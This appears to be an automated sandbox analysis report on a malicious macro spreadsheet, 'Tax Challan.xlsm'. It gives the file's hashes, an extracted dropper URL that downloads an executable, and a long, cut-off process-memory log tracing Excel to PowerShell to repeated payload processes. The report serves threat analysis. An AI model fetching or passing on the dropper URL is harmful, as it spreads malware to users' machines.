Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7 -
submitted
16-07-2020 07:55
Static task
static1
Behavioral task
behavioral1
Sample
Tax Challan.xlsm
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Tax Challan.xlsm
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
Tax Challan.xlsm
-
Size
88KB
-
MD5
8927ad6be7ff24a708641467b7f699d5
-
SHA1
9973dad26ac516f3a4f413624fa908a828e5df9b
-
SHA256
5f005ef79f2a337aa3e3537f304316bdb931dffa3cecacadc1cd094c1414bf4f
-
SHA512
fa5d459357e53bdf963126d3f0fa7fc840a6bb62448807f9ee8e38e65a58d0f9f00c0bdefcb0df3a6186843e80e9870df2c7ae455fbb623dfc92264e5dddea34
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://jurec.mx/doc.exe
Signatures
-
Suspicious use of WriteProcessMemory 1820 IoCs
description pid Process procid_target PID 608 wrote to memory of 452 608 EXCEL.EXE 24 PID 608 wrote to memory of 452 608 EXCEL.EXE 24 PID 608 wrote to memory of 452 608 EXCEL.EXE 24 PID 452 wrote to memory of 792 452 cmd.exe 26 PID 452 wrote to memory of 792 452 cmd.exe 26 PID 452 wrote to memory of 792 452 cmd.exe 26 PID 792 wrote to memory of 1312 792 powershell.exe 28 PID 792 wrote to memory of 1312 792 powershell.exe 28 PID 792 wrote to memory of 1312 792 powershell.exe 28 PID 792 wrote to memory of 1312 792 powershell.exe 28 PID 1312 wrote to memory of 1772 1312 LkAnJ.exe 29 PID 1312 wrote to memory of 1772 1312 LkAnJ.exe 29 PID 1312 wrote to memory of 1772 1312 LkAnJ.exe 29 PID 1312 wrote to memory of 1772 1312 LkAnJ.exe 29 PID 1312 wrote to memory of 1772 1312 LkAnJ.exe 29 PID 1312 wrote to memory of 1772 1312 LkAnJ.exe 29 PID 1312 wrote to memory of 1764 1312 LkAnJ.exe 30 PID 1312 wrote to memory of 1764 1312 LkAnJ.exe 30 PID 1312 wrote to memory of 1764 1312 LkAnJ.exe 30 PID 1312 wrote to memory of 1764 1312 LkAnJ.exe 30 PID 1312 wrote to memory of 1352 1312 LkAnJ.exe 31 PID 1312 wrote to memory of 1352 1312 LkAnJ.exe 31 PID 1312 wrote to memory of 1352 1312 LkAnJ.exe 31 PID 1312 wrote to memory of 1352 1312 LkAnJ.exe 31 PID 1764 wrote to memory of 1840 1764 LkAnJ.exe 32 PID 1764 wrote to memory of 1840 1764 LkAnJ.exe 32 PID 1764 wrote to memory of 1840 1764 LkAnJ.exe 32 PID 1764 wrote to memory of 1840 1764 LkAnJ.exe 32 PID 1764 wrote to memory of 1884 1764 LkAnJ.exe 34 PID 1764 wrote to memory of 1884 1764 LkAnJ.exe 34 PID 1764 wrote to memory of 1884 1764 LkAnJ.exe 34 PID 1764 wrote to memory of 1884 1764 LkAnJ.exe 34 PID 1352 wrote to memory of 1644 1352 LkAnJ.exe 35 PID 1352 wrote to memory of 1644 1352 LkAnJ.exe 35 PID 1352 wrote to memory of 1644 1352 LkAnJ.exe 35 PID 1352 wrote to memory of 1644 1352 LkAnJ.exe 35 PID 1884 wrote to memory of 1580 1884 images.exe 36 PID 1884 wrote to memory of 1580 1884 images.exe 36 PID 1884 wrote to memory of 1580 1884 images.exe 36 PID 1884 wrote to memory of 1580 1884 images.exe 36 PID 1884 wrote to memory of 1580 1884 images.exe 36 PID 1884 wrote to memory of 1580 1884 images.exe 36 PID 1884 wrote to memory of 1656 1884 images.exe 37 PID 1884 wrote to memory of 1656 1884 images.exe 37 PID 1884 wrote to memory of 1656 1884 images.exe 37 PID 1884 wrote to memory of 1656 1884 images.exe 37 PID 1884 wrote to memory of 1940 1884 images.exe 38 PID 1884 wrote to memory of 1940 1884 images.exe 38 PID 1884 wrote to memory of 1940 1884 images.exe 38 PID 1884 wrote to memory of 1940 1884 images.exe 38 PID 1644 wrote to memory of 1896 1644 LkAnJ.exe 39 PID 1644 wrote to memory of 1896 1644 LkAnJ.exe 39 PID 1644 wrote to memory of 1896 1644 LkAnJ.exe 39 PID 1644 wrote to memory of 1896 1644 LkAnJ.exe 39 PID 1644 wrote to memory of 1896 1644 LkAnJ.exe 39 PID 1644 wrote to memory of 1896 1644 LkAnJ.exe 39 PID 1644 wrote to memory of 1960 1644 LkAnJ.exe 40 PID 1644 wrote to memory of 1960 1644 LkAnJ.exe 40 PID 1644 wrote to memory of 1960 1644 LkAnJ.exe 40 PID 1644 wrote to memory of 1960 1644 LkAnJ.exe 40 PID 1644 wrote to memory of 1964 1644 LkAnJ.exe 41 PID 1644 wrote to memory of 1964 1644 LkAnJ.exe 41 PID 1644 wrote to memory of 1964 1644 LkAnJ.exe 41 PID 1644 wrote to memory of 1964 1644 LkAnJ.exe 41 PID 1964 wrote to memory of 2044 1964 LkAnJ.exe 42 PID 1964 wrote to memory of 2044 1964 LkAnJ.exe 42 PID 1964 wrote to memory of 2044 1964 LkAnJ.exe 42 PID 1964 wrote to memory of 2044 1964 LkAnJ.exe 42 PID 2044 wrote to memory of 1472 2044 LkAnJ.exe 43 PID 2044 wrote to memory of 1472 2044 LkAnJ.exe 43 PID 2044 wrote to memory of 1472 2044 LkAnJ.exe 43 PID 2044 wrote to memory of 1472 2044 LkAnJ.exe 43 PID 2044 wrote to memory of 1472 2044 LkAnJ.exe 43 PID 2044 wrote to memory of 1472 2044 LkAnJ.exe 43 PID 2044 wrote to memory of 1564 2044 LkAnJ.exe 44 PID 2044 wrote to memory of 1564 2044 LkAnJ.exe 44 PID 2044 wrote to memory of 1564 2044 LkAnJ.exe 44 PID 2044 wrote to memory of 1564 2044 LkAnJ.exe 44 PID 2044 wrote to memory of 340 2044 LkAnJ.exe 45 PID 2044 wrote to memory of 340 2044 LkAnJ.exe 45 PID 2044 wrote to memory of 340 2044 LkAnJ.exe 45 PID 2044 wrote to memory of 340 2044 LkAnJ.exe 45 PID 1656 wrote to memory of 652 1656 images.exe 46 PID 1656 wrote to memory of 652 1656 images.exe 46 PID 1656 wrote to memory of 652 1656 images.exe 46 PID 1656 wrote to memory of 652 1656 images.exe 46 PID 1656 wrote to memory of 468 1656 images.exe 47 PID 1656 wrote to memory of 468 1656 images.exe 47 PID 1656 wrote to memory of 468 1656 images.exe 47 PID 1656 wrote to memory of 468 1656 images.exe 47 PID 340 wrote to memory of 1056 340 LkAnJ.exe 50 PID 340 wrote to memory of 1056 340 LkAnJ.exe 50 PID 340 wrote to memory of 1056 340 LkAnJ.exe 50 PID 340 wrote to memory of 1056 340 LkAnJ.exe 50 PID 1056 wrote to memory of 792 1056 LkAnJ.exe 51 PID 1056 wrote to memory of 792 1056 LkAnJ.exe 51 PID 1056 wrote to memory of 792 1056 LkAnJ.exe 51 PID 1056 wrote to memory of 792 1056 LkAnJ.exe 51 PID 1056 wrote to memory of 792 1056 LkAnJ.exe 51 PID 1056 wrote to memory of 792 1056 LkAnJ.exe 51 PID 1056 wrote to memory of 1612 1056 LkAnJ.exe 52 PID 1056 wrote to memory of 1612 1056 LkAnJ.exe 52 PID 1056 wrote to memory of 1612 1056 LkAnJ.exe 52 PID 1056 wrote to memory of 1612 1056 LkAnJ.exe 52 PID 1656 wrote to memory of 468 1656 images.exe 47 PID 1656 wrote to memory of 468 1656 images.exe 47 PID 1056 wrote to memory of 1520 1056 LkAnJ.exe 53 PID 1056 wrote to memory of 1520 1056 LkAnJ.exe 53 PID 1056 wrote to memory of 1520 1056 LkAnJ.exe 53 PID 1056 wrote to memory of 1520 1056 LkAnJ.exe 53 PID 1520 wrote to memory of 1588 1520 LkAnJ.exe 55 PID 1520 wrote to memory of 1588 1520 LkAnJ.exe 55 PID 1520 wrote to memory of 1588 1520 LkAnJ.exe 55 PID 1520 wrote to memory of 1588 1520 LkAnJ.exe 55 PID 1588 wrote to memory of 1972 1588 LkAnJ.exe 56 PID 1588 wrote to memory of 1972 1588 LkAnJ.exe 56 PID 1588 wrote to memory of 1972 1588 LkAnJ.exe 56 PID 1588 wrote to memory of 1972 1588 LkAnJ.exe 56 PID 1588 wrote to memory of 1972 1588 LkAnJ.exe 56 PID 1588 wrote to memory of 1972 1588 LkAnJ.exe 56 PID 1588 wrote to memory of 1576 1588 LkAnJ.exe 57 PID 1588 wrote to memory of 1576 1588 LkAnJ.exe 57 PID 1588 wrote to memory of 1576 1588 LkAnJ.exe 57 PID 1588 wrote to memory of 1576 1588 LkAnJ.exe 57 PID 1588 wrote to memory of 1172 1588 LkAnJ.exe 58 PID 1588 wrote to memory of 1172 1588 LkAnJ.exe 58 PID 1588 wrote to memory of 1172 1588 LkAnJ.exe 58 PID 1588 wrote to memory of 1172 1588 LkAnJ.exe 58 PID 1172 wrote to memory of 2044 1172 LkAnJ.exe 59 PID 1172 wrote to memory of 2044 1172 LkAnJ.exe 59 PID 1172 wrote to memory of 2044 1172 LkAnJ.exe 59 PID 1172 wrote to memory of 2044 1172 LkAnJ.exe 59 PID 2044 wrote to memory of 876 2044 LkAnJ.exe 60 PID 2044 wrote to memory of 876 2044 LkAnJ.exe 60 PID 2044 wrote to memory of 876 2044 LkAnJ.exe 60 PID 2044 wrote to memory of 876 2044 LkAnJ.exe 60 PID 2044 wrote to memory of 876 2044 LkAnJ.exe 60 PID 2044 wrote to memory of 876 2044 LkAnJ.exe 60 PID 2044 wrote to memory of 512 2044 LkAnJ.exe 61 PID 2044 wrote to memory of 512 2044 LkAnJ.exe 61 PID 2044 wrote to memory of 512 2044 LkAnJ.exe 61 PID 2044 wrote to memory of 512 2044 LkAnJ.exe 61 PID 2044 wrote to memory of 1488 2044 LkAnJ.exe 62 PID 2044 wrote to memory of 1488 2044 LkAnJ.exe 62 PID 2044 wrote to memory of 1488 2044 LkAnJ.exe 62 PID 2044 wrote to memory of 1488 2044 LkAnJ.exe 62 PID 1488 wrote to memory of 1696 1488 LkAnJ.exe 63 PID 1488 wrote to memory of 1696 1488 LkAnJ.exe 63 PID 1488 wrote to memory of 1696 1488 LkAnJ.exe 63 PID 1488 wrote to memory of 1696 1488 LkAnJ.exe 63 PID 1696 wrote to memory of 1000 1696 LkAnJ.exe 64 PID 1696 wrote to memory of 1000 1696 LkAnJ.exe 64 PID 1696 wrote to memory of 1000 1696 LkAnJ.exe 64 PID 1696 wrote to memory of 1000 1696 LkAnJ.exe 64 PID 1696 wrote to memory of 1000 1696 LkAnJ.exe 64 PID 1696 wrote to memory of 1000 1696 LkAnJ.exe 64 PID 1696 wrote to memory of 1860 1696 LkAnJ.exe 65 PID 1696 wrote to memory of 1860 1696 LkAnJ.exe 65 PID 1696 wrote to memory of 1860 1696 LkAnJ.exe 65 PID 1696 wrote to memory of 1860 1696 LkAnJ.exe 65 PID 1696 wrote to memory of 1132 1696 LkAnJ.exe 66 PID 1696 wrote to memory of 1132 1696 LkAnJ.exe 66 PID 1696 wrote to memory of 1132 1696 LkAnJ.exe 66 PID 1696 wrote to memory of 1132 1696 LkAnJ.exe 66 PID 1132 wrote to memory of 1980 1132 LkAnJ.exe 68 PID 1132 wrote to memory of 1980 1132 LkAnJ.exe 68 PID 1132 wrote to memory of 1980 1132 LkAnJ.exe 68 PID 1132 wrote to memory of 1980 1132 LkAnJ.exe 68 PID 1980 wrote to memory of 1192 1980 LkAnJ.exe 69 PID 1980 wrote to memory of 1192 1980 LkAnJ.exe 69 PID 1980 wrote to memory of 1192 1980 LkAnJ.exe 69 PID 1980 wrote to memory of 1192 1980 LkAnJ.exe 69 PID 1980 wrote to memory of 1192 1980 LkAnJ.exe 69 PID 1980 wrote to memory of 1192 1980 LkAnJ.exe 69 PID 1980 wrote to memory of 1936 1980 LkAnJ.exe 70 PID 1980 wrote to memory of 1936 1980 LkAnJ.exe 70 PID 1980 wrote to memory of 1936 1980 LkAnJ.exe 70 PID 1980 wrote to memory of 1936 1980 LkAnJ.exe 70 PID 1980 wrote to memory of 1836 1980 LkAnJ.exe 71 PID 1980 wrote to memory of 1836 1980 LkAnJ.exe 71 PID 1980 wrote to memory of 1836 1980 LkAnJ.exe 71 PID 1980 wrote to memory of 1836 1980 LkAnJ.exe 71 PID 1836 wrote to memory of 1816 1836 LkAnJ.exe 72 PID 1836 wrote to memory of 1816 1836 LkAnJ.exe 72 PID 1836 wrote to memory of 1816 1836 LkAnJ.exe 72 PID 1836 wrote to memory of 1816 1836 LkAnJ.exe 72 PID 1816 wrote to memory of 652 1816 LkAnJ.exe 73 PID 1816 wrote to memory of 652 1816 LkAnJ.exe 73 PID 1816 wrote to memory of 652 1816 LkAnJ.exe 73 PID 1816 wrote to memory of 652 1816 LkAnJ.exe 73 PID 1816 wrote to memory of 652 1816 LkAnJ.exe 73 PID 1816 wrote to memory of 652 1816 LkAnJ.exe 73 PID 1816 wrote to memory of 2016 1816 LkAnJ.exe 74 PID 1816 wrote to memory of 2016 1816 LkAnJ.exe 74 PID 1816 wrote to memory of 2016 1816 LkAnJ.exe 74 PID 1816 wrote to memory of 2016 1816 LkAnJ.exe 74 PID 1816 wrote to memory of 788 1816 LkAnJ.exe 75 PID 1816 wrote to memory of 788 1816 LkAnJ.exe 75 PID 1816 wrote to memory of 788 1816 LkAnJ.exe 75 PID 1816 wrote to memory of 788 1816 LkAnJ.exe 75 PID 788 wrote to memory of 1184 788 LkAnJ.exe 76 PID 788 wrote to memory of 1184 788 LkAnJ.exe 76 PID 788 wrote to memory of 1184 788 LkAnJ.exe 76 PID 788 wrote to memory of 1184 788 LkAnJ.exe 76 PID 1184 wrote to memory of 512 1184 LkAnJ.exe 77 PID 1184 wrote to memory of 512 1184 LkAnJ.exe 77 PID 1184 wrote to memory of 512 1184 LkAnJ.exe 77 PID 1184 wrote to memory of 512 1184 LkAnJ.exe 77 PID 1184 wrote to memory of 512 1184 LkAnJ.exe 77 PID 1184 wrote to memory of 512 1184 LkAnJ.exe 77 PID 1184 wrote to memory of 1760 1184 LkAnJ.exe 78 PID 1184 wrote to memory of 1760 1184 LkAnJ.exe 78 PID 1184 wrote to memory of 1760 1184 LkAnJ.exe 78 PID 1184 wrote to memory of 1760 1184 LkAnJ.exe 78 PID 1184 wrote to memory of 1056 1184 LkAnJ.exe 79 PID 1184 wrote to memory of 1056 1184 LkAnJ.exe 79 PID 1184 wrote to memory of 1056 1184 LkAnJ.exe 79 PID 1184 wrote to memory of 1056 1184 LkAnJ.exe 79 PID 1056 wrote to memory of 1232 1056 LkAnJ.exe 80 PID 1056 wrote to memory of 1232 1056 LkAnJ.exe 80 PID 1056 wrote to memory of 1232 1056 LkAnJ.exe 80 PID 1056 wrote to memory of 1232 1056 LkAnJ.exe 80 PID 1232 wrote to memory of 1268 1232 LkAnJ.exe 81 PID 1232 wrote to memory of 1268 1232 LkAnJ.exe 81 PID 1232 wrote to memory of 1268 1232 LkAnJ.exe 81 PID 1232 wrote to memory of 1268 1232 LkAnJ.exe 81 PID 1232 wrote to memory of 1268 1232 LkAnJ.exe 81 PID 1232 wrote to memory of 1268 1232 LkAnJ.exe 81 PID 1232 wrote to memory of 1256 1232 LkAnJ.exe 82 PID 1232 wrote to memory of 1256 1232 LkAnJ.exe 82 PID 1232 wrote to memory of 1256 1232 LkAnJ.exe 82 PID 1232 wrote to memory of 1256 1232 LkAnJ.exe 82 PID 1232 wrote to memory of 1548 1232 LkAnJ.exe 83 PID 1232 wrote to memory of 1548 1232 LkAnJ.exe 83 PID 1232 wrote to memory of 1548 1232 LkAnJ.exe 83 PID 1232 wrote to memory of 1548 1232 LkAnJ.exe 83 PID 1548 wrote to memory of 2040 1548 LkAnJ.exe 84 PID 1548 wrote to memory of 2040 1548 LkAnJ.exe 84 PID 1548 wrote to memory of 2040 1548 LkAnJ.exe 84 PID 1548 wrote to memory of 2040 1548 LkAnJ.exe 84 PID 2040 wrote to memory of 988 2040 LkAnJ.exe 85 PID 2040 wrote to memory of 988 2040 LkAnJ.exe 85 PID 2040 wrote to memory of 988 2040 LkAnJ.exe 85 PID 2040 wrote to memory of 988 2040 LkAnJ.exe 85 PID 2040 wrote to memory of 988 2040 LkAnJ.exe 85 PID 2040 wrote to memory of 988 2040 LkAnJ.exe 85 PID 2040 wrote to memory of 1824 2040 LkAnJ.exe 86 PID 2040 wrote to memory of 1824 2040 LkAnJ.exe 86 PID 2040 wrote to memory of 1824 2040 LkAnJ.exe 86 PID 2040 wrote to memory of 1824 2040 LkAnJ.exe 86 PID 2040 wrote to memory of 1908 2040 LkAnJ.exe 87 PID 2040 wrote to memory of 1908 2040 LkAnJ.exe 87 PID 2040 wrote to memory of 1908 2040 LkAnJ.exe 87 PID 2040 wrote to memory of 1908 2040 LkAnJ.exe 87 PID 1908 wrote to memory of 1836 1908 LkAnJ.exe 88 PID 1908 wrote to memory of 1836 1908 LkAnJ.exe 88 PID 1908 wrote to memory of 1836 1908 LkAnJ.exe 88 PID 1908 wrote to memory of 1836 1908 LkAnJ.exe 88 PID 1836 wrote to memory of 1368 1836 LkAnJ.exe 89 PID 1836 wrote to memory of 1368 1836 LkAnJ.exe 89 PID 1836 wrote to memory of 1368 1836 LkAnJ.exe 89 PID 1836 wrote to memory of 1368 1836 LkAnJ.exe 89 PID 1836 wrote to memory of 1368 1836 LkAnJ.exe 89 PID 1836 wrote to memory of 1368 1836 LkAnJ.exe 89 PID 1836 wrote to memory of 1816 1836 LkAnJ.exe 90 PID 1836 wrote to memory of 1816 1836 LkAnJ.exe 90 PID 1836 wrote to memory of 1816 1836 LkAnJ.exe 90 PID 1836 wrote to memory of 1816 1836 LkAnJ.exe 90 PID 1836 wrote to memory of 1496 1836 LkAnJ.exe 91 PID 1836 wrote to memory of 1496 1836 LkAnJ.exe 91 PID 1836 wrote to memory of 1496 1836 LkAnJ.exe 91 PID 1836 wrote to memory of 1496 1836 LkAnJ.exe 91 PID 1496 wrote to memory of 1680 1496 LkAnJ.exe 92 PID 1496 wrote to memory of 1680 1496 LkAnJ.exe 92 PID 1496 wrote to memory of 1680 1496 LkAnJ.exe 92 PID 1496 wrote to memory of 1680 1496 LkAnJ.exe 92 PID 1680 wrote to memory of 1524 1680 LkAnJ.exe 93 PID 1680 wrote to memory of 1524 1680 LkAnJ.exe 93 PID 1680 wrote to memory of 1524 1680 LkAnJ.exe 93 PID 1680 wrote to memory of 1524 1680 LkAnJ.exe 93 PID 1680 wrote to memory of 1524 1680 LkAnJ.exe 93 PID 1680 wrote to memory of 1524 1680 LkAnJ.exe 93 PID 1680 wrote to memory of 1516 1680 LkAnJ.exe 94 PID 1680 wrote to memory of 1516 1680 LkAnJ.exe 94 PID 1680 wrote to memory of 1516 1680 LkAnJ.exe 94 PID 1680 wrote to memory of 1516 1680 LkAnJ.exe 94 PID 1680 wrote to memory of 480 1680 LkAnJ.exe 95 PID 1680 wrote to memory of 480 1680 LkAnJ.exe 95 PID 1680 wrote to memory of 480 1680 LkAnJ.exe 95 PID 1680 wrote to memory of 480 1680 LkAnJ.exe 95 PID 480 wrote to memory of 1252 480 LkAnJ.exe 96 PID 480 wrote to memory of 1252 480 LkAnJ.exe 96 PID 480 wrote to memory of 1252 480 LkAnJ.exe 96 PID 480 wrote to memory of 1252 480 LkAnJ.exe 96 PID 1252 wrote to memory of 1168 1252 LkAnJ.exe 97 PID 1252 wrote to memory of 1168 1252 LkAnJ.exe 97 PID 1252 wrote to memory of 1168 1252 LkAnJ.exe 97 PID 1252 wrote to memory of 1168 1252 LkAnJ.exe 97 PID 1252 wrote to memory of 1168 1252 LkAnJ.exe 97 PID 1252 wrote to memory of 1168 1252 LkAnJ.exe 97 PID 1252 wrote to memory of 1868 1252 LkAnJ.exe 98 PID 1252 wrote to memory of 1868 1252 LkAnJ.exe 98 PID 1252 wrote to memory of 1868 1252 LkAnJ.exe 98 PID 1252 wrote to memory of 1868 1252 LkAnJ.exe 98 PID 1252 wrote to memory of 1412 1252 LkAnJ.exe 99 PID 1252 wrote to memory of 1412 1252 LkAnJ.exe 99 PID 1252 wrote to memory of 1412 1252 LkAnJ.exe 99 PID 1252 wrote to memory of 1412 1252 LkAnJ.exe 99 PID 1412 wrote to memory of 1544 1412 LkAnJ.exe 100 PID 1412 wrote to memory of 1544 1412 LkAnJ.exe 100 PID 1412 wrote to memory of 1544 1412 LkAnJ.exe 100 PID 1412 wrote to memory of 1544 1412 LkAnJ.exe 100 PID 1544 wrote to memory of 1984 1544 LkAnJ.exe 101 PID 1544 wrote to memory of 1984 1544 LkAnJ.exe 101 PID 1544 wrote to memory of 1984 1544 LkAnJ.exe 101 PID 1544 wrote to memory of 1984 1544 LkAnJ.exe 101 PID 1544 wrote to memory of 1984 1544 LkAnJ.exe 101 PID 1544 wrote to memory of 1984 1544 LkAnJ.exe 101 PID 1544 wrote to memory of 1976 1544 LkAnJ.exe 102 PID 1544 wrote to memory of 1976 1544 LkAnJ.exe 102 PID 1544 wrote to memory of 1976 1544 LkAnJ.exe 102 PID 1544 wrote to memory of 1976 1544 LkAnJ.exe 102 PID 1544 wrote to memory of 1552 1544 LkAnJ.exe 103 PID 1544 wrote to memory of 1552 1544 LkAnJ.exe 103 PID 1544 wrote to memory of 1552 1544 LkAnJ.exe 103 PID 1544 wrote to memory of 1552 1544 LkAnJ.exe 103 PID 1552 wrote to memory of 304 1552 LkAnJ.exe 104 PID 1552 wrote to memory of 304 1552 LkAnJ.exe 104 PID 1552 wrote to memory of 304 1552 LkAnJ.exe 104 PID 1552 wrote to memory of 304 1552 LkAnJ.exe 104 PID 304 wrote to memory of 736 304 LkAnJ.exe 105 PID 304 wrote to memory of 736 304 LkAnJ.exe 105 PID 304 wrote to memory of 736 304 LkAnJ.exe 105 PID 304 wrote to memory of 736 304 LkAnJ.exe 105 PID 304 wrote to memory of 736 304 LkAnJ.exe 105 PID 304 wrote to memory of 736 304 LkAnJ.exe 105 PID 304 wrote to memory of 340 304 LkAnJ.exe 106 PID 304 wrote to memory of 340 304 LkAnJ.exe 106 PID 304 wrote to memory of 340 304 LkAnJ.exe 106 PID 304 wrote to memory of 340 304 LkAnJ.exe 106 PID 304 wrote to memory of 788 304 LkAnJ.exe 107 PID 304 wrote to memory of 788 304 LkAnJ.exe 107 PID 304 wrote to memory of 788 304 LkAnJ.exe 107 PID 304 wrote to memory of 788 304 LkAnJ.exe 107 PID 788 wrote to memory of 1768 788 LkAnJ.exe 108 PID 788 wrote to memory of 1768 788 LkAnJ.exe 108 PID 788 wrote to memory of 1768 788 LkAnJ.exe 108 PID 788 wrote to memory of 1768 788 LkAnJ.exe 108 PID 1768 wrote to memory of 1128 1768 LkAnJ.exe 109 PID 1768 wrote to memory of 1128 1768 LkAnJ.exe 109 PID 1768 wrote to memory of 1128 1768 LkAnJ.exe 109 PID 1768 wrote to memory of 1128 1768 LkAnJ.exe 109 PID 1768 wrote to memory of 1128 1768 LkAnJ.exe 109 PID 1768 wrote to memory of 1128 1768 LkAnJ.exe 109 PID 1768 wrote to memory of 1852 1768 LkAnJ.exe 110 PID 1768 wrote to memory of 1852 1768 LkAnJ.exe 110 PID 1768 wrote to memory of 1852 1768 LkAnJ.exe 110 PID 1768 wrote to memory of 1852 1768 LkAnJ.exe 110 PID 1768 wrote to memory of 1724 1768 LkAnJ.exe 111 PID 1768 wrote to memory of 1724 1768 LkAnJ.exe 111 PID 1768 wrote to memory of 1724 1768 LkAnJ.exe 111 PID 1768 wrote to memory of 1724 1768 LkAnJ.exe 111 PID 1724 wrote to memory of 1592 1724 LkAnJ.exe 112 PID 1724 wrote to memory of 1592 1724 LkAnJ.exe 112 PID 1724 wrote to memory of 1592 1724 LkAnJ.exe 112 PID 1724 wrote to memory of 1592 1724 LkAnJ.exe 112 PID 1592 wrote to memory of 1812 1592 LkAnJ.exe 113 PID 1592 wrote to memory of 1812 1592 LkAnJ.exe 113 PID 1592 wrote to memory of 1812 1592 LkAnJ.exe 113 PID 1592 wrote to memory of 1812 1592 LkAnJ.exe 113 PID 1592 wrote to memory of 1812 1592 LkAnJ.exe 113 PID 1592 wrote to memory of 1812 1592 LkAnJ.exe 113 PID 1592 wrote to memory of 1256 1592 LkAnJ.exe 114 PID 1592 wrote to memory of 1256 1592 LkAnJ.exe 114 PID 1592 wrote to memory of 1256 1592 LkAnJ.exe 114 PID 1592 wrote to memory of 1256 1592 LkAnJ.exe 114 PID 1592 wrote to memory of 2036 1592 LkAnJ.exe 115 PID 1592 wrote to memory of 2036 1592 LkAnJ.exe 115 PID 1592 wrote to memory of 2036 1592 LkAnJ.exe 115 PID 1592 wrote to memory of 2036 1592 LkAnJ.exe 115 PID 2036 wrote to memory of 756 2036 LkAnJ.exe 116 PID 2036 wrote to memory of 756 2036 LkAnJ.exe 116 PID 2036 wrote to memory of 756 2036 LkAnJ.exe 116 PID 2036 wrote to memory of 756 2036 LkAnJ.exe 116 PID 756 wrote to memory of 1368 756 LkAnJ.exe 117 PID 756 wrote to memory of 1368 756 LkAnJ.exe 117 PID 756 wrote to memory of 1368 756 LkAnJ.exe 117 PID 756 wrote to memory of 1368 756 LkAnJ.exe 117 PID 756 wrote to memory of 1368 756 LkAnJ.exe 117 PID 756 wrote to memory of 1368 756 LkAnJ.exe 117 PID 756 wrote to memory of 520 756 LkAnJ.exe 118 PID 756 wrote to memory of 520 756 LkAnJ.exe 118 PID 756 wrote to memory of 520 756 LkAnJ.exe 118 PID 756 wrote to memory of 520 756 LkAnJ.exe 118 PID 756 wrote to memory of 1836 756 LkAnJ.exe 119 PID 756 wrote to memory of 1836 756 LkAnJ.exe 119 PID 756 wrote to memory of 1836 756 LkAnJ.exe 119 PID 756 wrote to memory of 1836 756 LkAnJ.exe 119 PID 1836 wrote to memory of 1816 1836 LkAnJ.exe 120 PID 1836 wrote to memory of 1816 1836 LkAnJ.exe 120 PID 1836 wrote to memory of 1816 1836 LkAnJ.exe 120 PID 1836 wrote to memory of 1816 1836 LkAnJ.exe 120 PID 1816 wrote to memory of 1496 1816 LkAnJ.exe 121 PID 1816 wrote to memory of 1496 1816 LkAnJ.exe 121 PID 1816 wrote to memory of 1496 1816 LkAnJ.exe 121 PID 1816 wrote to memory of 1496 1816 LkAnJ.exe 121 PID 1816 wrote to memory of 1496 1816 LkAnJ.exe 121 PID 1816 wrote to memory of 1496 1816 LkAnJ.exe 121 PID 1816 wrote to memory of 1760 1816 LkAnJ.exe 122 PID 1816 wrote to memory of 1760 1816 LkAnJ.exe 122 PID 1816 wrote to memory of 1760 1816 LkAnJ.exe 122 PID 1816 wrote to memory of 1760 1816 LkAnJ.exe 122 PID 1816 wrote to memory of 1784 1816 LkAnJ.exe 123 PID 1816 wrote to memory of 1784 1816 LkAnJ.exe 123 PID 1816 wrote to memory of 1784 1816 LkAnJ.exe 123 PID 1816 wrote to memory of 1784 1816 LkAnJ.exe 123 PID 1784 wrote to memory of 1516 1784 LkAnJ.exe 124 PID 1784 wrote to memory of 1516 1784 LkAnJ.exe 124 PID 1784 wrote to memory of 1516 1784 LkAnJ.exe 124 PID 1784 wrote to memory of 1516 1784 LkAnJ.exe 124 PID 1516 wrote to memory of 292 1516 LkAnJ.exe 125 PID 1516 wrote to memory of 292 1516 LkAnJ.exe 125 PID 1516 wrote to memory of 292 1516 LkAnJ.exe 125 PID 1516 wrote to memory of 292 1516 LkAnJ.exe 125 PID 1516 wrote to memory of 292 1516 LkAnJ.exe 125 PID 1516 wrote to memory of 292 1516 LkAnJ.exe 125 PID 1516 wrote to memory of 1840 1516 LkAnJ.exe 126 PID 1516 wrote to memory of 1840 1516 LkAnJ.exe 126 PID 1516 wrote to memory of 1840 1516 LkAnJ.exe 126 PID 1516 wrote to memory of 1840 1516 LkAnJ.exe 126 PID 1516 wrote to memory of 452 1516 LkAnJ.exe 127 PID 1516 wrote to memory of 452 1516 LkAnJ.exe 127 PID 1516 wrote to memory of 452 1516 LkAnJ.exe 127 PID 1516 wrote to memory of 452 1516 LkAnJ.exe 127 PID 452 wrote to memory of 616 452 LkAnJ.exe 128 PID 452 wrote to memory of 616 452 LkAnJ.exe 128 PID 452 wrote to memory of 616 452 LkAnJ.exe 128 PID 452 wrote to memory of 616 452 LkAnJ.exe 128 PID 616 wrote to memory of 1552 616 LkAnJ.exe 129 PID 616 wrote to memory of 1552 616 LkAnJ.exe 129 PID 616 wrote to memory of 1552 616 LkAnJ.exe 129 PID 616 wrote to memory of 1552 616 LkAnJ.exe 129 PID 616 wrote to memory of 1552 616 LkAnJ.exe 129 PID 616 wrote to memory of 1552 616 LkAnJ.exe 129 PID 616 wrote to memory of 2016 616 LkAnJ.exe 130 PID 616 wrote to memory of 2016 616 LkAnJ.exe 130 PID 616 wrote to memory of 2016 616 LkAnJ.exe 130 PID 616 wrote to memory of 2016 616 LkAnJ.exe 130 PID 616 wrote to memory of 1912 616 LkAnJ.exe 131 PID 616 wrote to memory of 1912 616 LkAnJ.exe 131 PID 616 wrote to memory of 1912 616 LkAnJ.exe 131 PID 616 wrote to memory of 1912 616 LkAnJ.exe 131 PID 1912 wrote to memory of 1052 1912 LkAnJ.exe 132 PID 1912 wrote to memory of 1052 1912 LkAnJ.exe 132 PID 1912 wrote to memory of 1052 1912 LkAnJ.exe 132 PID 1912 wrote to memory of 1052 1912 LkAnJ.exe 132 PID 1052 wrote to memory of 1240 1052 LkAnJ.exe 133 PID 1052 wrote to memory of 1240 1052 LkAnJ.exe 133 PID 1052 wrote to memory of 1240 1052 LkAnJ.exe 133 PID 1052 wrote to memory of 1240 1052 LkAnJ.exe 133 PID 1052 wrote to memory of 1240 1052 LkAnJ.exe 133 PID 1052 wrote to memory of 1240 1052 LkAnJ.exe 133 PID 1052 wrote to memory of 2012 1052 LkAnJ.exe 134 PID 1052 wrote to memory of 2012 1052 LkAnJ.exe 134 PID 1052 wrote to memory of 2012 1052 